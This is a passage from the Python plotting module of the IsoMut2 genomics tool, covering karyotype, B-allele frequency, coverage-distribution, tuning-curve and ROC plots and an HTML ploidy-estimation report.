__os.path.isfile(output_dir + '/PE_fullchrom_' + c + '.txt'):\n raise ValueError(\n 'File ' + output_dir + '/PE_fullchrom_' + c + '.txt is not yet created, call \"run_ploidy_estimation\" first.')\n df = __pd.read_csv(output_dir + '/PE_fullchrom_' + c + '.txt', sep='\\t')\n df = df[['chrom', 'pos', 'cov', 'mut_freq', 'ploidy', 'LOH']]\n if (return_string):\n all_chrom_figfiles.append(plot_karyotype_for_chrom(chrom=c, df=df, return_string=True))\n else:\n all_chrom_figfiles.append(plot_karyotype_for_chrom(chrom=c, df=df, return_string=False))\n return all_chrom_figfiles\n\n\ndef __get_BAF_and_DR(avg_dip_cov, chroms, chrom_length_list, datadir,\n binsize=1000000,\n overlap=50000,\n cov_min=5,\n cov_max=200):\n \"\"\"\n\n Calculates depth ratio means, 25th and 75th percentiles in windows of genomic positions with a moving average method.\n Calculates B-allele frequency means, 25th and 75th percentiles in windows of genomic positions with a moving average method.\n\n :param avg_dip_cov: average coverage of diploid regions (float)\n :param chroms: list of chromosomes of the genome (list of str)\n :param chrom_length_list: list of chromosome lengths in basepairs (list of int)\n :param datadir: the path to the directory where PE_fullchrom_[chrom].txt files are stored\n :param binsize: the binsize used for moving average (default: 1000000) (int)\n :param overlap: the overlap used for moving average (default: 50000) (int, smaller than binsize)\n :param cov_min: the minimum coverage for a position to be included (default: 5) (int)\n :param cov_max: the maximum coverage for a position to be included (default: 2000) (int)\n\n :returns: (real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75)\n\n - real_pos: list of real genomic positions (int in range (1-genome_length))\n - dr: list of average depth ratios in the neighborhood of the above positions\n - dr_25: list of 25th percentiles of depth ratios in the neighborhood of the above positions\n - dr_75: list of 75th percentiles of depth ratios in the neighborhood of the above positions\n - baf: list of average B-allele frequencies in the neighborhood of the above positions\n - baf_25: list of 25th percentiles of B-allele frequencies in the neighborhood of the above positions\n - baf_75: list of 75th percentiles of B-allele frequencies in the neighborhood of the above positions\n\n \"\"\"\n\n real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75 = [[] for i in range(7)]\n\n for c in chroms:\n posbase = sum(chrom_length_list[:chroms.index(c)])\n tmp = __pd.read_csv(datadir + '/PE_fullchrom_' + c + '.txt', sep='\\t')\n tmp = tmp[(tmp['cov'] >= cov_min) & (tmp['cov'] <= cov_max)]\n\n posstart = tmp['pos'].min()\n posmax = tmp['pos'].max()\n while posstart < posmax:\n if tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)].shape[0] > 0:\n bafs = __np.array(list(tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)]['mut_freq']))\n if len(bafs[bafs >= 0.5]) > 0:\n real_pos.append(int(posstart + binsize / 2) + posbase)\n bafs = 1 - bafs[bafs >= 0.5]\n baf.append(__np.mean(bafs))\n baf_25.append(__np.percentile(bafs, 25))\n baf_75.append(__np.percentile(bafs, 75))\n covs = __np.array(list(tmp[(tmp['pos'] >= posstart) & (tmp['pos'] < posstart + binsize)]['cov']))\n dr.append(__np.mean(covs / avg_dip_cov))\n dr_25.append(__np.percentile(covs / avg_dip_cov, 25))\n dr_75.append(__np.percentile(covs / avg_dip_cov, 75))\n if posstart + binsize > posmax:\n break\n posstart += (binsize - overlap)\n\n return real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75\n\n\ndef __get_PL_and_LOH(bed_filename,\n chroms,\n chrom_lenght_list,\n bed_file_sep=',',\n numtoplot=10000,\n minlength=3000000):\n \"\"\"\n\n From a bed file of ploidies and LOH regions, generates a list of numtoplot positions with respective ploidies and LOHs.\n\n :param bed_filename: path to the bed file of the sample containing ploidy and LOH information (str)\n :param chroms: list of chromosomes in the genome (list of str)\n :param chrom_lenght_list: list of chromosome lengths in basepairs (list of int)\n :param bed_file_sep: bed file separator (default: \",\") (str)\n :param numtoplot: the number measurement points (default: 10000) (int)\n :param minlength: the minimal length of a region to be plotted (default: 3000000) (int)\n\n :returns: (toplot_pos, toplot_pl, toplot_pos_loh, toplot_loh)\n\n - toplot_pos: genomic positions in which ploidy should be plotted\n - toplot_pl: the ploidy in these positions\n - toplot_pos_loh: genomic positions in which LOHs should be plotted\n - toplot_loh: the LOH in these positions\n\n \"\"\"\n\n toplot_pos = __np.arange(numtoplot) * int(sum(chrom_lenght_list) / numtoplot)\n toplot_pl = __np.zeros(numtoplot)\n toplot_loh = __np.zeros(numtoplot)\n\n pl_res = __pd.read_csv(bed_filename, sep=bed_file_sep)\n\n cs_list, ce_list, p_list, l_list = [[] for i in range(4)]\n\n for c, cs, ce, p, l in zip(list(pl_res['chrom']), list(pl_res['chromStart']), list(pl_res['chromEnd']),\n list(pl_res['ploidy']), list(pl_res['LOH'])):\n if ce - cs > minlength:\n cs_list.append(cs + sum(chrom_lenght_list[:chroms.index(c)]))\n ce_list.append(ce + sum(chrom_lenght_list[:chroms.index(c)]))\n p_list.append(p)\n l_list.append(l)\n for i in range(len(cs_list) - 1):\n if ce_list[i] + 1 < cs_list[i + 1]:\n bp = int(__np.mean([ce_list[i], cs_list[i + 1]]))\n ce_list[i] = bp\n cs_list[i + 1] = bp + 1\n for j in range(numtoplot):\n if toplot_pos[j] >= cs_list[i] and toplot_pos[j] < ce_list[i]:\n toplot_pl[j] = p_list[i]\n toplot_loh[j] = l_list[i]\n toplot_pos_loh = toplot_pos[toplot_loh == 1]\n toplot_loh = __np.ones(len(toplot_pos_loh))\n\n return toplot_pos, toplot_pl, toplot_pos_loh, toplot_loh\n\n\ndef __plot_karyotype(real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75, s0, s1, loh_pos, loh,\n all_chroms,\n chrom_length_list,\n chroms_with_text=None):\n \"\"\"\n\n Plots a karyotype summary for the whole genome.\n\n :param real_pos: list of real genomic positions (int in range (1-genome_length))\n :param dr: list of average depth ratios in the neighborhood of the above positions\n :param dr_25: list of 25th percentiles of depth ratios in the neighborhood of the above positions\n :param dr_75: list of 75th percentiles of depth ratios in the neighborhood of the above positions\n :param baf: list of average B-allele frequencies in the neighborhood of the above positions\n :param baf_25: list of 25th percentiles of B-allele frequencies in the neighborhood of the above positions\n :param baf_75: list of 75th percentiles of B-allele frequencies in the neighborhood of the above positions\n :param s0: list of genomic positions in which to plot ploidy information\n :param s1: ploidies in these positions\n :param loh_pos: list of genomic positions in which to plot LOH information\n :param loh: list of LOH values in these positions\n :param all_chroms: list of all chromosomes in the genome (list of str)\n :param chrom_length_list: list of chromosome lengths (list of int)\n :param chroms_with_text: the list of chromosomes to be indicated with text on the plot (list of str) (If there are many short chromosomes or they have long names, it is useful to only indicate a few with text on the plot.)\n\n :returns: a matplotlib figure\n\n \"\"\"\n\n if chroms_with_text is None:\n chroms_with_text = all_chroms\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n fig, axes = __plt.subplots(nrows=2, sharex=True)\n fig.set_size_inches(18 / 2.5, 9 / 2.5)\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97, hspace=0.2)\n\n ax_dr, ax_baf = axes\n ax_pl1 = ax_dr.twinx()\n ax_pl2 = ax_baf.twinx()\n\n idx = __np.random.choice(__np.arange(len(real_pos)), size=int(__np.min([5000, len(real_pos)])), replace=False)\n\n # plotting depth ratios\n\n error = [__np.array(dr_25)[idx], __np.array(dr_75)[idx]]\n ax_dr.errorbar(__np.array(real_pos)[idx], __np.array(dr)[idx], yerr=error, fmt='o', ecolor='#E6E6FA',\n markeredgecolor='black', markerfacecolor='black', ms=2, capsize=0)\n ax_pl1.scatter(s0, s1, edgecolor='red', facecolor='red', s=3)\n ax_dr.set_ylabel('Depth ratio\\n', size=10)\n ax_pl1.set_ylabel('\\n\\nEstimated ploidy', size=10)\n ax_dr.set_ylim([-0.25, 2.75])\n ax_pl1.set_ylim([-0.5, 5.5])\n ax_dr.set_yticks([0, 0.5, 1, 1.5, 2, 2.5])\n ax_pl1.set_yticks([0, 1, 2, 3, 4, 5])\n ax_dr.tick_params(axis='x', size=0)\n ax_pl1.tick_params(axis='x', size=0)\n\n # plotting chrom borders\n\n for c in all_chroms:\n ax_dr.plot([sum(chrom_length_list[:all_chroms.index(c)]), sum(chrom_length_list[:all_chroms.index(c)])],\n [-0.25, 2.75], lw=1.5, c='#9C9C9C')\n ax_baf.plot([sum(chrom_length_list[:all_chroms.index(c)]), sum(chrom_length_list[:all_chroms.index(c)])],\n [-0.05, 0.55], lw=1.5, c='#9C9C9C')\n for c in chroms_with_text:\n ax_dr.text(sum(chrom_length_list[:all_chroms.index(c)]) + 0.5 * chrom_length_list[all_chroms.index(c)], -0.65,\n c, fontsize=6, color='#8F8F8F', horizontalalignment='center')\n\n # plotting bafs\n\n error = [__np.array(baf_25)[idx], __np.array(baf_75)[idx]]\n ax_baf.errorbar(__np.array(real_pos)[idx], __np.array(baf)[idx], yerr=error, fmt='o', ecolor='#E6E6FA',\n markeredgecolor='black', markerfacecolor='black', ms=2, capsize=0)\n ax_pl2.scatter(s0, 1 / __np.array(s1) * (__np.array(s1) != 1), edgecolor='red', facecolor='red', s=3)\n if len(loh_pos) > 0:\n ax_pl2.scatter(loh_pos, loh * (-0.15), edgecolor='orange', facecolor='orange', s=1.5, clip_on=False)\n ax_pl2.text(-0.085, -0.14, 'LOH',\n verticalalignment='center', horizontalalignment='center',\n transform=ax_pl2.transAxes, fontsize=10, rotation=90)\n\n ax_baf.set_ylabel('BAF\\n', size=10)\n ax_pl2.set_ylabel('\\n1/Estimated ploidy', size=10)\n ax_baf.set_ylim([-0.05, 0.55])\n ax_baf.set_xlim([0, max(real_pos)])\n ax_pl2.set_ylim([-0.05, 0.55])\n ax_baf.set_yticks([0, 0.1, 0.2, 0.3, 0.4, 0.5])\n ax_pl2.set_yticks([0, 0.1, 0.2, 0.3, 0.4, 0.5])\n ax_pl2.tick_params(axis='x', size=0)\n ax_baf.tick_params(axis='x', size=0)\n ax_baf.set_xticklabels(size=0, labels=[1, 2, 3])\n ax_pl2.set_xticklabels(size=0, labels=[1, 2, 3])\n\n # plotting fig\n __plt.show()\n return fig\n\n\ndef plot_karyotype_summary(haploid_coverage,\n chromosomes,\n chrom_length,\n output_dir,\n bed_filename,\n bed_file_sep=',',\n binsize=1000000,\n overlap=50000,\n cov_min=5,\n cov_max=200,\n min_PL_length=3000000,\n chroms_with_text=None):\n \"\"\"\n\n Plots karyotype summary for the whole genome with data preparation.\n\n :param haploid_coverage: the average coverage of haploid regions (or the half of that of diploid regions)\n :param chromosomes: list of chromosomes in the genome (list of str)\n :param chrom_length: list of chromosome lengths (list of int)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (str)\n :param bed_filename: the path to the bed file of the sample with ploidy and LOH information (str)\n :param bed_file_sep: bed file separator (default: ',') (str)\n :param binsize: the binsize used for moving average (default: 1000000) (int)\n :param overlap: the overlap used for moving average (default: 50000) (int, smaller than binsize)\n :param cov_min: the minimum coverage for a position to be included (default: 5) (int)\n :param cov_max: the maximum coverage for a position to be included (default: 2000) (int)\n :param min_PL_length: the minimal length of a region to be plotted (default: 3000000) (int)\n :param chroms_with_text: the list of chromosomes to be indicated with text on the plot (list of str) (If there are many short chromosomes or they have long names, it is useful to only indicate a few with text on the plot.)\n\n :returns: a matplotlib figure\n\n \"\"\"\n\n real_pos, dr, dr_25, dr_75, baf, baf_25, baf_75 = __get_BAF_and_DR(avg_dip_cov=haploid_coverage * 2,\n chroms=chromosomes,\n chrom_length_list=chrom_length,\n datadir=output_dir,\n binsize=binsize,\n overlap=overlap,\n cov_min=cov_min,\n cov_max=cov_max)\n s0, s1, loh_pos, loh = __get_PL_and_LOH(bed_filename=bed_filename,\n chroms=chromosomes,\n chrom_lenght_list=chrom_length,\n bed_file_sep=bed_file_sep,\n numtoplot=5000,\n minlength=min_PL_length)\n\n f = __plot_karyotype(real_pos=real_pos,\n dr=dr,\n dr_25=dr_25,\n dr_75=dr_75,\n baf=baf,\n baf_25=baf_25,\n baf_75=baf_75,\n s0=s0,\n s1=s1,\n loh_pos=loh_pos,\n loh=loh,\n all_chroms=chromosomes,\n chrom_length_list=chrom_length,\n chroms_with_text=chroms_with_text)\n\n return f\n\n\ndef generate_HTML_report_for_ploidy_est(chromosomes, output_dir, min_noise=__np.nan):\n \"\"\"\n\n Generates a HTML file with figures displaying the results of ploidy estimation and saves it to output_dir/PEreport.html.\n\n :param chromosomes: list of chromosomes in the genome (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (str)\n :param min_noise: the minimal B-allele frequency for a position to be included in the analyses (default: numpy.nan) (float)\n\n \"\"\"\n\n FIG_all_chroms = plot_karyotype_for_all_chroms(chromosomes, output_dir, return_string=True)\n\n string_for_all_chroms = ''\n for ch_figfile in FIG_all_chroms:\n string_for_all_chroms += '''<img src=\"data:image/png;base64,''' + ch_figfile.decode(\n 'utf-8') + '''\" alt=\"detailed_PEs.png\"><br>'''\n\n # generating HTML report\n\n html_string = '''\n <html>\n <style>\n @import url(https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic);\n @import url(https://fonts.googleapis.com/css?family=Open+Sans:800)\n @import url(http://fonts.googleapis.com/css?family=Lato|Source+Code+Pro|Montserrat:400,700);\n @import url(https://fonts.googleapis.com/css?family=Raleway);\n @import \"font-awesome-sprockets\";\n @import \"font-awesome\";\n\n body {\n font-family: 'Lora', 'Times New Roman', serif;\n font-size: 12pt;\n line-height: 145%;}\n\n p {\n text-align: justify;}\n\n h1,h2,h3,h4,h5,h6 {\n font-family: 'Open Sans', sans-serif;\n font-weight: 800;\n line-height: 145%;}\n\n h1 {\n font-size: 4rem;}\n h2 {\n font-size: 3.5rem;}\n\n .MathJax{\n font-size: 7pt;}\n\n img {\n text-align:center;\n display:block;}\n\n </style>\n <script type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML\"></script>\n <script>\n MathJax.Hub.Config({\n tex2jax: {inlineMath: [['$','$']]}\n });\n </script>\n\n <head>\n <meta charset=\"utf-8\">\n </head>\n <body>\n <h2>IsoMut2 results - ploidy estimation</h2>\n <br>\n Date and time of analysis: ''' + str(__datetime.now()).split('.')[0] + ''' <br><br>\n Data stored at: <br>\n ''' + output_dir + ''' <br><br>\n <h3>Local ploidy estimates throughout the whole genome:</h3>\n Only those positions are included on the plots below, where the reference nucleotide frequency is in\n the range [''' + str(min_noise) + ''', ''' + str(1 - min_noise) + '''].\n <br><br>\n On the figures below yellow lines represent <i>coverage</i>, and purple dots the <i>reference nucleotide frequency</i> values for the above defined\n genomic positions. Black dots show the <i>inverse of the estimated copy number</i> at the given position. Grey rectangles indicate LOH (loss of\n heterozygosity) regions.\n <br><br>''' + string_for_all_chroms\n\n html_string += '''\n </body>\n </html>'''\n\n with open(output_dir + '/PEreport.html', 'w') as f:\n f.write(html_string)\n\n\ndef plot_coverage_distribution(cov_sample=None,\n chromosomes=None,\n output_dir=None,\n cov_max=None,\n cov_min=None,\n distribution_dict=None):\n \"\"\"\n\n Plot the coverage distribution of the sample.\n\n :param cov_sample: a sample of the coverage distribution (default: None) (array-like)\n :param chromosomes: the list of chromosomes in the genome (default: None) (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are located (default: None) (str)\n :param cov_max: the maximum value for the coverage for a position to be included on the plot (default: None) (int)\n :param cov_min: the minimum value for the coverage for a position to be included on the plot (default: None) (int)\n :param distribution_dict: a dictionary containing the fitted parameters of the coverage distribution (default: None) (dictionary with keys: 'mu', 'sigma', 'p')\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if cov_sample is None:\n cov_sample = io.get_coverage_distribution(chromosomes=chromosomes,\n output_dir=output_dir,\n cov_max=cov_max,\n cov_min=cov_min)\n\n if distribution_dict is not None or (__os.path.isfile(output_dir + '/GaussDistParams.pkl')):\n if distribution_dict == None:\n distribution_dict = io.load_cov_distribution_parameters_from_file()\n\n range_max = distribution_dict['mu'][-1] + 3 * distribution_dict['sigma'][-1]\n colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\n '#bcbd22', '#17becf']\n x = __np.linspace(0, range_max, 500)\n\n for i in range(len(distribution_dict['mu'])):\n m = distribution_dict['p'][i] * __stats.norm.pdf(x, loc=distribution_dict['mu'][i],\n scale=distribution_dict['sigma'][i])\n\n plot_temp = __plt.plot(x, m, label=\"Ploidy \" + str(i + 1), lw=3, color=colors[i])\n __plt.fill_between(x, m, color=plot_temp[0].get_color(), alpha=0.3)\n __plt.xlim(0, range_max)\n\n __plt.hist(cov_sample, bins=100, histtype=\"step\", density=True, color=\"k\",\n lw=2, label=\"coverage histogram\")\n __plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., framealpha=0.0)\n\n __plt.title(\"Coverage distribution\\n\")\n __plt.xlabel('coverage')\n __plt.ylabel('relative occurence')\n f = __plt.gcf()\n __plt.show()\n __plt.close()\n\n return f\n\n\ndef __plot_tuning_curve(control_samples, mutation_dataframe, return_string=False, unique_samples=None):\n \"\"\"\n\n Plots tuning curves for all mutations types (SNV, INS, DEL) and all ploidies for each available sample in the MutationDetection object.\n Samples listed as control_samples are highlighted with a different color.\n\n :param control_samples: a subset of bam_filename (list of sample names) that should be considered as control samples. Control samples are defined as samples where no unique mutations are expected to be found. (list of str)\n :param mutation_dataframe: The dataframe containing the mutations. (pandas.DataFrame)\n :param unique_samples: list of unique samples where at least one mutation is detected (default: None) (list of str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if unique_samples == None:\n unique_samples = sorted(\n list(set([item for s in list(mutation_dataframe['sample_name'].unique()) for item in s.split(', ')])))\n\n ymax_SNV = mutation_dataframe[mutation_dataframe['type'] == 'SNV'].groupby(['sample_name']).count().max()['chr']\n ymax_INS = mutation_dataframe[mutation_dataframe['type'] == 'INS'].groupby(['sample_name']).count().max()['chr']\n ymax_DEL = mutation_dataframe[mutation_dataframe['type'] == 'DEL'].groupby(['sample_name']).count().max()['chr']\n ymax = [ymax_SNV, ymax_INS, ymax_DEL]\n ymax_all = [10 ** (len(str(ym))) for ym in ymax]\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n unique_ploidies = sorted([int(i) for i in list(mutation_dataframe['ploidy'].unique())])\n\n color_dict_base = {'control': '#008B8B',\n 'treated': '#8B008B'}\n\n color_list = [color_dict_base['control'] if s in control_samples\n else color_dict_base['treated'] for s in unique_samples]\n\n fig, axes = __plt.subplots(len(unique_ploidies), 3)\n fig.set_size_inches(21, 5 * len(unique_ploidies))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n for m in range(len(mut_types_all)):\n if (len(unique_ploidies) == 1):\n ymax = 10 ** len(str(mutation_dataframe[(mutation_dataframe['type'] == mut_types_all[m]) & (\n mutation_dataframe['ploidy'] == unique_ploidies[0])].groupby(['sample_name']).count().max()['chr']))\n for s, c in zip(unique_samples, color_list):\n l = 'control samples' if s in control_samples else 'treated samples'\n score = mutation_dataframe[\n (mutation_dataframe['type'] == mut_types_all[m]) & (mutation_dataframe['sample_name'] == s) & (\n mutation_dataframe['ploidy'] == unique_ploidies[0])].sort_values(by='score')['score']\n axes[m].plot(score, len(score) - __np.arange(len(score)), c=c, label=l)\n axes[m].set_xlabel(r'score threshold', fontsize=12)\n axes[m].set_title(mut_types_all[m] + ' (ploidy: ' + str(unique_ploidies[0]) + ')\\n', fontsize=14)\n axes[m].set_ylabel(r'Mutations found', fontsize=12)\n axes[m].set_ylim(1, ymax)\n axes[m].set_yscale('log')\n axes[m].set_xlim(0, mutation_dataframe['score'].max())\n # axes[i][m].grid()\n handles, labels = axes[m].get_legend_handles_labels()\n labels, ids = __np.unique(labels, return_index=True)\n handles = [handles[k] for k in ids]\n axes[m].legend(handles, labels, loc='upper right', fancybox=True)\n else:\n for i in range(len(unique_ploidies)):\n ymax = 10 ** len(str(mutation_dataframe[(mutation_dataframe['type'] == mut_types_all[m]) & (\n mutation_dataframe['ploidy'] == unique_ploidies[i])].groupby(['sample_name']).count().max()[\n 'chr']))\n for s, c in zip(unique_samples, color_list):\n l = 'control samples' if s in control_samples else 'treated samples'\n score = mutation_dataframe[\n (mutation_dataframe['type'] == mut_types_all[m]) & (mutation_dataframe['sample_name'] == s) & (\n mutation_dataframe['ploidy'] == unique_ploidies[i])].sort_values(by='score')['score']\n axes[i][m].plot(score, len(score) - __np.arange(len(score)), c=c, label=l)\n axes[i][m].set_xlabel(r'score threshold', fontsize=12)\n axes[i][m].set_title(mut_types_all[m] + ' (ploidy: ' + str(unique_ploidies[i]) + ')\\n', fontsize=14)\n axes[i][m].set_ylabel(r'Mutations found', fontsize=12)\n axes[i][m].set_ylim(1, ymax)\n axes[i][m].set_yscale('log')\n axes[i][m].set_xlim(0, mutation_dataframe['score'].max())\n # axes[i][m].grid()\n handles, labels = axes[i][m].get_legend_handles_labels()\n labels, ids = __np.unique(labels, return_index=True)\n handles = [handles[k] for k in ids]\n axes[i][m].legend(handles, labels, loc='upper right', fancybox=True)\n\n if (not return_string):\n __plt.show()\n __plt.close()\n return fig\n else:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n\n\ndef __plot_roc(mutation_dataframe, control_samples,\n FPs_per_genome, score0=0, plot_roc=True, return_string=False, unique_samples=None):\n \"\"\"\n\n Optimizes score values for different mutation types (SNV, INS, DEL) and ploidies according to the list of control samples and the desired\n level of false positives in the genome.\n The results are stored in the score_lim_dict attribute of the MutationDetection object. If plot = True, plots ROC curves for all mutations\n types (SNV, INS, DEL) and all ploidies.\n\n :param mutation_dataframe: The dataframe containing the mutations. (pandas.DataFrame)\n :param control_samples: a subset of bam_filename (list of sample names) that should be considered as control samples. Control samples are defined as samples where no unique mutations are expected to be found. (list of str)\n :param FPs_per_genome: the largest number of false positives tolerated in a control sample (int)\n :param score0: Score optimization starts with score0. If a larger score value is likely to be optimal, setting score0 to a number larger than 0 can decrease computation time. (default: 0) (float)\n :param plot_roc: If True, ROC curves are plotted, otherwise score optimization is performed without generating any figures. (default: True) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param unique_samples: list of unique samples where at least one mutation is detected (default: None) (list of str)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a matplotlib figure.\n\n \"\"\"\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n steps = 50\n\n if unique_samples == None:\n unique_samples = sorted(\n list(set([item for s in list(mutation_dataframe['sample_name'].unique()) for item in s.split(', ')])))\n\n total_num_of_FPs_per_genome = FPs_per_genome\n\n unique_ploidies = sorted(list(mutation_dataframe['ploidy'].unique()))\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n score_lim_dict = {'SNV': [], 'INS': [], 'DEL': []}\n\n control_idx = []\n treated_idx = []\n for i in range(len(unique_samples)):\n if (unique_samples[i] in control_samples):\n control_idx.append(i)\n else:\n treated_idx.append(i)\n\n control_idx = __np.array(control_idx)\n treated_idx = __np.array(treated_idx)\n\n if total_num_of_FPs_per_genome is not None:\n FPs_per_ploidy = dict()\n for m in mut_types_all:\n FPs_per_ploidy[m] = dict()\n for pl in unique_ploidies:\n totalmuts_per_ploidy = \\\n mutation_dataframe[(mutation_dataframe['ploidy'] == pl) & (mutation_dataframe['type'] == m)].shape[\n 0]\n totalmuts = mutation_dataframe[(mutation_dataframe['type'] == m)].shape[0]\n if (totalmuts == 0):\n FPs_per_ploidy[m][pl] = total_num_of_FPs_per_genome\n else:\n FPs_per_ploidy[m][pl] = int(\n round((float(totalmuts_per_ploidy) / totalmuts) * total_num_of_FPs_per_genome))\n\n if plot_roc:\n fig, axes = __plt.subplots(len(unique_ploidies), 3)\n fig.set_size_inches(21, 5 * len(unique_ploidies))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n\n for m in range(len(mut_types_all)):\n if len(unique_ploidies) == 1:\n fp, tp = [0 for k in range(steps)], [0 for k in range(steps)]\n fp_real, tp_real = [0 for k in range(steps)], [0 for k in range(steps)]\n for score_lim, j in zip(\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps),\n range(steps)):\n muts = []\n for s in unique_samples:\n muts.append(mutation_dataframe[(mutation_dataframe['ploidy'] == unique_ploidies[0]) &\n (mutation_dataframe['sample_name'] == s) &\n (mutation_dataframe['score'] > score_lim) &\n (mutation_dataframe['type'] == mut_types_all[m])].shape[0])\n muts = __np.array(muts)\n fp[j], tp[j] = 1e-6 * __np.max(muts[control_idx]), 1e-6 * __np.mean(muts[treated_idx])\n fp_real[j], tp_real[j] = __np.max(muts[control_idx]), __np.mean(muts[treated_idx])\n if (plot_roc):\n axes[m].step(fp, tp, c='#DB7093', lw=3)\n axes[m].set_title(mut_types_all[m] + ' (ploidy: ' + str(int(unique_ploidies[0])) + ')\\n',\n fontsize=14)\n\n if (total_num_of_FPs_per_genome is not None):\n fp_real = __np.array(fp_real)\n tp_real = __np.array(tp_real)\n if (len(tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]]) > 0):\n tps = tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n fps = fp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n score_lim = \\\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps)[\n fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[0]]][0]\n if (plot_roc):\n axes[m].plot(fps * 1e-6, tps * 1e-6, 'o', mec='#C71585', mfc='#C71585', ms=15, mew=3,\n label='score limit: ' + str(score_lim))\n axes[m].text(0.95, 0.06, 'score limit: ' + str(score_lim),\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[m].transAxes)\n else:\n score_lim = 10000\n if (plot_roc):\n axes[m].text(0.95, 0.06, 'score limit: inf',\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[m].transAxes)\n score_lim_dict[mut_types_all[m]].append(score_lim)\n if (plot_roc):\n axes[m].set_ylim(bottom=0)\n axes[m].set_xlim(left=0)\n axes[m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n axes[m].ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))\n axes[m].set_xlabel('false positive rate 1/Mbp ', fontsize=12)\n axes[m].set_ylabel('mutation rate 1/Mbp ', fontsize=12)\n\n else:\n for i in range(len(unique_ploidies)):\n fp, tp = [0 for k in range(steps)], [0 for k in range(steps)]\n fp_real, tp_real = [0 for k in range(steps)], [0 for k in range(steps)]\n for score_lim, j in zip(\n __np.linspace(score0,\n mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]]['score'].max(),\n steps),\n range(steps)):\n muts = []\n for s in unique_samples:\n muts.append(mutation_dataframe[(mutation_dataframe['ploidy'] == unique_ploidies[i]) &\n (mutation_dataframe['sample_name'] == s) &\n (mutation_dataframe['score'] > score_lim) &\n (mutation_dataframe['type'] == mut_types_all[m])].shape[0])\n muts = __np.array(muts)\n fp[j], tp[j] = 1e-6 * __np.max(muts[control_idx]), 1e-6 * __np.mean(muts[treated_idx])\n fp_real[j], tp_real[j] = __np.max(muts[control_idx]), __np.mean(muts[treated_idx])\n if plot_roc:\n axes[i][m].step(fp, tp, c='#DB7093', lw=3)\n axes[i][m].set_title(mut_types_all[m] + ' (ploidy: ' + str(int(unique_ploidies[i])) + ')\\n',\n fontsize=14)\n\n if total_num_of_FPs_per_genome is not None:\n fp_real = __np.array(fp_real)\n tp_real = __np.array(tp_real)\n if (len(tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]]) > 0):\n tps = tp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n fps = fp_real[fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n score_lim = \\\n __np.linspace(score0, mutation_dataframe[mutation_dataframe['type'] == mut_types_all[m]][\n 'score'].max(), steps)[\n fp_real <= FPs_per_ploidy[mut_types_all[m]][unique_ploidies[i]]][0]\n if (plot_roc):\n axes[i][m].plot(fps * 1e-6, tps * 1e-6, 'o', mec='#C71585', mfc='#C71585', ms=15, mew=3,\n label='score limit: ' + str(score_lim))\n axes[i][m].text(0.95, 0.06, 'score limit: ' + str(score_lim),\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[i][m].transAxes)\n else:\n score_lim = 10000\n if (plot_roc):\n axes[i][m].text(0.95, 0.06, 'score limit: inf',\n bbox={'facecolor': 'white', 'pad': 10}, verticalalignment='bottom',\n horizontalalignment='right', transform=axes[i][m].transAxes)\n score_lim_dict[mut_types_all[m]].append(score_lim)\n if plot_roc:\n axes[i][m].set_ylim(bottom=0)\n axes[i][m].set_xlim(left=0)\n axes[i][m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n 